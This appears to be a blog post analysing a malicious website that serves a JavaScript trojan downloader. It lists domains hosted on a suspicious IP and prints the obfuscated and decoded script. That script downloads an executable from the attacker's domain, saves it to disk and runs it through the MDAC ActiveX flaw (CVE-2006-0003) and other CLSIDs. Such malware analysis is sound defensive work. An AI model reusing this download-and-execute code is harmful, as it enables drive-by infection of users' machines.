Trojan.Js.Downloader.BDS Website with exploit and Malware

Warning, browse the reported links only with Malzilla.
Browsing passive DNS replication services that collects public DNS data is a great system malware investigation, or better for Suspicious IPs research.

Attention today is centred on 78.47.186.165 IP that looks suspect, let’s query DNS Replication Service.

http://www.bfk.de/bfk_dnslogger_en.html?query=78.47.186.165#result

as you can see we obtain the following list:

* wergnd.info A 78.47.186.165
* eyetje.info A 78.47.186.165
* dsfgng.info A 78.47.186.165
* sgfnsg.info A 78.47.186.165
* ltuyjm.info A 78.47.186.165
* dfgdet.info A 78.47.186.165
* etyjyt.info A 78.47.186.165
* eryjey.info A 78.47.186.165

other hosted:

*

etyjyt.info
kb923561.in
kb929399.in
kb936782.in
kb952004.in
kb959426.in
kb960225.in
kb960715.in
kb960803.in
kb960859.info
kb968389.info
ntwin.in

Our attention will be on egtrhn.info precisely on

http://egtrhn.info//index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml

we have a first redirection to:
http://egtrhn.info/index2.php?src=583&trk=09181706298102074

where is located and obfuscated JS script:

function get_pic(z0){
var zr0=0,i,j,zr1=”1″,ff=0xff,zr2=”2″,z9=0xc,zr3=3,b=0x400,r,z7=3,s=0,z8=”ss”,w=0,p=0,t=Array(63,56,55,60,4,31,16,19,20,27,0,0,0,0,0,0,25,42,18,22,49,30,24,51,8,62,46,36,59,61,58,17,54,45,53,48,41,47,0,1,3,21,10,0,0,0,0,44,0,13,28,33,5,11,39,7,34,29,15,50,43,12,26,57,2,9,35,23,6,14,40,38,32,52,37);
z2=z0;l=z2.length;
for(j=Math.ceil(l/b);j>0;j–){r=”;
for(i=Math.min(l,b);i>0;l–,i–){z1=t[z2.charCodeAt(p++)-48];z3=z1<>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8=”7″;z9=w}}
y1=”document”;
y2=”write”;
eval(y1+”.”+y2+”(r)”)}}y5=”f2″;y4=”get_pic”;y3=y4+'(“H0bIckN..{BLOCK_OF_DATA}..r3GolElDhnALr3G”)’;y6=”()”;eval(y3);

function get_pic(z0) deobfuscates the Block of Data that I partiallu reported here, algorithm used is pretty
easy and can be pasted directly into Malzilla Decoder.. here the decoded block of data:

<div id=”demoobj”></div>
<script language=”javascript”>
var space=””;
function lsrn(pt31) {
var ldob=null; var tds1=17;
var st2=”2″;
var stms=”Microsoft”;
var stmss=”MS”;
var stxml=”XML”;
var stdt=”.”;
var stht=”HTTP”;
var stsrv=”Server”;
var url=”http://egtrhn.info/gfl.php?d=14&trk=09220521365129336&s=m06&#8243;;
var tds2=17;
var stgt=”GET”;
var std=”D”;
var stbd=”Body”;
var strsp=”response”;
var ev1=”ldob”+stdt+”open(stgt,url,false);”;
var stsv=”Save”;
try { ldob=objmker(pt31, stms+stdt+stxml+stht); eval(ev1); }
catch(e) {
try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stxml+stht); eval(ev1); }
catch(e) {
try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stsrv+stxml+stht); eval(ev1); }
catch(e) { try { ldob=new XMLHttpRequest(); eval(ev1); }
catch(e){ return 0;
};
};
};
};
try { ldob.send(null); }
catch(e) {
try { ldob.send(null); }
catch(e) { return 0;
};
};

as you can see from the Bolded variable this piece of code deals with an URL
http://egtrhn.info/gfl.php?d=14&trk=09220521365129336&s=m06
this link contains a malicious executable.

eval(“ld”+stbd+”=ldob.”+strsp+stbd);
var obj_strm=objmker(pt31, “A”+std+”O”+std+”B.Stream”);
if (obj_strm) {
obj_strm.Type=1; obj_strm.Mode=3; obj_strm.Open(); obj_strm.Write(ldBody);
var hdrv=””; var dtemp=””; var dstart=””; var daustart=””;
try {var obj_WScript=objmker(pt31, “WScript.Shell”);
try{var wshProcEnv=obj_WScript.Environment(“PROCESS”); hdrv=wshProcEnv(“HOMEDRIVE”); dtemp=wshProcEnv(“TEMP”)
;}catch(e){   };
}
catch(e){};
if (hdrv==””) { hdrv=”C:”; };
if (dtemp==””) {
try {
var obj_fso=objmker(pt31, “Scripting.FileSystemObject”);
dtemp=obj_fso.GetSpecialFolder(2);
}catch(e){  };
};

here is builded the downloader for the malicious executable.

var fn2=””; var fn=””;
var strnd=Math.round(Math.random()*(100000-1)+10000);
var ev2=”obj_strm.”+stsv+”ToFile(fn,”+st2+”);fn2=fn;”;
if(fn2==””){try{Tv=dtemp;fn=Tv+”\\tmp”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==””){try{Tv=hdrv;fn=Tv+”\\RECYCLER\\”+strnd+”.exe”;eval(ev2);}catch(e){};};
if(fn2==””){try{Tv=hdrv;fn=Tv+”\\sys”+strnd+”.exe”;eval(ev2);}catch(e){};};
if (fn2!=””){

attach a random string to executable name.

var tst2=space;
var tobjst=tst2;
var falret=0;
try{
var zpa1=”var obj_shl=obj”+tst2+”mker(pt31,\”Sh”+tst2+”ell.”+tst2+”Application\”);”; eval(zpa1);
var zpa2=”obj_shl”+tst2+”.Sh”+tst2+”ellEx”+tst2+”ecute(fn2);”;eval(zpa2);
}catch(e){
try{
zpa3=”obj_W”+tst2+”Script.”+tst2+”Exec(fn2);”;eval(zpa3);
}catch(e){

looking carefully to these three vars you can see some well known string represented in a splitted way to deceive basilar webcheckers, here the rebuilded strings

* Shell.Application\
* obj_shl.ShellExecute(fn2)
* obj_W Script.Exec(fn2)

try{
zpa4=”var demoobj2=document.”+tst2+”getElem”+tst2+”ent”+tst2+”ById(\”demoobj\”);”;eval(zpa4);
var zpa5=”demoobj2″+tobjst+”.inner”+tst2+”HTML”+tobjst+”=demoobj2″+tobjst+”.inner”+
tst2+”HTML”+tobjst+”+\”<obj”+tst2+”ect”+tobjst+” clas”+tst2+”sid”+tobjst+”=’cls”+tst2+”id:”+tobjst+”5271″+tst2+”96a4-b1a3-4647-931d-37ba5″+tst2+”af23037″+tobjst+”‘ code”+tst2+”base=”+tobjst+”‘\”+fn2+\”‘></”+tobjst+”object”+tst2+”>\”;”;
eval(zpa5);
}catch(e){

zpa5 is the most interesting, between the various strings is builded a CLSID.

clsid:527196a4-b1a3-4647-931d-37ba5af23037 this belongs to MDAC ActiveX
code execution (CVE-2006-0003)

An attacker who successfully exploited this vulnerability could gain the same user rights
as the local user. Users whose accounts are configured to have fewer user rights on the
system could be less impacted than users who operate with administrative user rights.

return falret;
};
};
};
return 1;
}else{
return 0;
};
}else{return 0;};
};

function objmker(pt21,pt22) {
var tds=27; var nobj=null; var stno=”nobj=pt21.”; var stem=””;
try{eval(stno+’CreateObject(pt22)’);}catch(e){}
if(!nobj){try{eval(stno+’Cre’+stem+’ateO’+stem+’bject(pt22,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Cre’+stem+’ateO’+stem+’bject(pt22,””,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(“”,pt22)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(pt22,””)’);}catch(e){}}
if(!nobj){try{eval(stno+’Get’+stem+’Obje’+stem+’ct(pt22)’);}catch(e){}}
return(nobj);
}
var tds=17; var i=0; var stcb1=”-0000-0000-C000-000000000046″; var st1m=”1-“; var stm1=”-1″;
var hncx=new Array(“BD96C556-65A3″+stm1+”1D0-983A-00C04FC29E36″,”AB9BCEDD-EC7E-47E”+st1m+”9322-D4A210617116″,”0006F033″+stcb1,”0006F03A”+stcb1,”6E32070A-766D-4EE6-879C-DC1FA91D2FC3″,”6414512B-B978-451D-A0D8-FCFDF33E833C”,”7F5B7F63-F06F-433″+st1m+”8A26-339E03C0AE3D”,”06723E09-F4C2-43c8-8358-09FCD1DB0766″,”639F725F”+stm1+”B2D-483″+st1m+”A9FD-874847682010″,”BA018599″+stm1+”DB3-44f9-83B4-461454C84BF8″,”D0C07D56-7C69-43F”+st1m+”B4A0-25F5A11FAB19″,”E8CCCDDF-CA28-496b-B050-6C07C962476B”,null);

Let’s isolate some harcoded value and research about it

BD96C556-65A3-11D0-983A-00C04FC29E36

this belongs to InternetExplorer MDAC vulnerability

other CLSID used are

* {BD96C556-65A3-11D0-983A-00C04FC29E30}
* {BD96C556-65A3-11D0-983A-00C04FC29E36}
* {AB9BCEDD-EC7E-47E1-9322-D4A210617116}
* {0006F033-0000-0000-C000-000000000046}
* {0006F03A-0000-0000-C000-000000000046}
* {6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
* {6414512B-B978-451D-A0D8-FCFDF33E833C}
* {7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
* {06723E09-F4C2-43c8-8358-09FCD1DB0766}
* {639F725F-1B2D-4831-A9FD-874847682010}
* {BA018599-1DB3-44f9-83B4-461454C84BF8}
* {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
* {E8CCCDDF-CA28-496b-B050-6C07C962476B}

var stob=”object”; var stid=”id”; var strd=”obj_RDS”; var iuump=null;
while (hncx[i]) {
try{
iuump=null;iuump=document.createElement(stob);iuump.setAttribute(stid,strd+i);iuump.setAttribute(“class”+stid,”cls”+stid+”:”+hncx[i]);
}catch(e){};
if(iuump){try{if(lsrn(iuump)){break;};}catch(e){};};
i++;
}
</script>
</body>
</html>

definitely this javascript downloads the infected file into the root directory “C:\” with this name :

* “sys[4 random letters].exe”

Regards,

Giuseppe ‘Evilcry’ Bonfa’

One Response to Trojan.Js.Downloader.BDS Website with exploit and Malware

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: